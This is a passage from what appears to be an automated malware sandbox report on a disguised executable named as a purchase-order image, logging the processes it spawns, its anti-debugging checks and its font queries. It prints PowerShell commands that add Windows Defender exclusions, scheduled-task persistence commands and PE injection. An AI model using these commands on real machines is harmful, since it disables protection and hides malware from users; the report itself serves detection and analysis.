                      Source: svchost.exe, 0000000B.00000002.2872552456.000001DE5265A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2871213206.000001DE4D02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Native_snake01.exe, 0000000C.00000002.3617602087.00000000004E5000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000012.00000002.3617462119.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3617459567.00000000005CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeAPI call chain: ExitProcess graph end nodegraph_10-50622
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeAPI call chain: ExitProcess graph end nodegraph_12-128990
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_05DF0040 LdrInitializeThunk,LdrInitializeThunk,10_2_05DF0040
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040CE09
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,10_2_004019F0
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0040ADB0 GetProcessHeap,HeapFree,10_2_0040ADB0
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeCode function: 9_2_00401475 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit,9_2_00401475
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040CE09
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040E61C
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00416F6A
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_004123F1 SetUnhandledExceptionFilter,10_2_004123F1
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0040CE09
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0040E61C
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00416F6A
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: 12_2_004123F1 SetUnhandledExceptionFilter,12_2_004123F1
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe"
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe"Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeMemory written: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeMemory written: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp2D18.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe "C:\Users\user\Desktop\RFQ_PO_98473009.png.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lVbhkOPdhyxT" /XML "C:\Users\user\AppData\Local\Temp\tmp4227.tmp"
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess created: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe "C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe"
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe "C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe"
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeProcess created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe "C:\Users\user\AppData\Local\Temp\Native_snake01.exe"
                      Source: Native_snake01.exe, 0000000C.00000002.3625599331.00000000025C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager(
                      Source: Native_snake01.exe, 0000000C.00000002.3625599331.0000000002745000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                      Source: Native_snake01.exe, 0000000C.00000002.3625599331.0000000002745000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000013.00000002.3626598913.000000000263C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: Native_snake01.exe, 0000000C.00000002.3625599331.0000000002591000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagertT}
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: GetLocaleInfoA,10_2_00417A20
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeCode function: GetLocaleInfoA,12_2_00417A20
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Users\user\Desktop\RFQ_PO_98473009.png.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
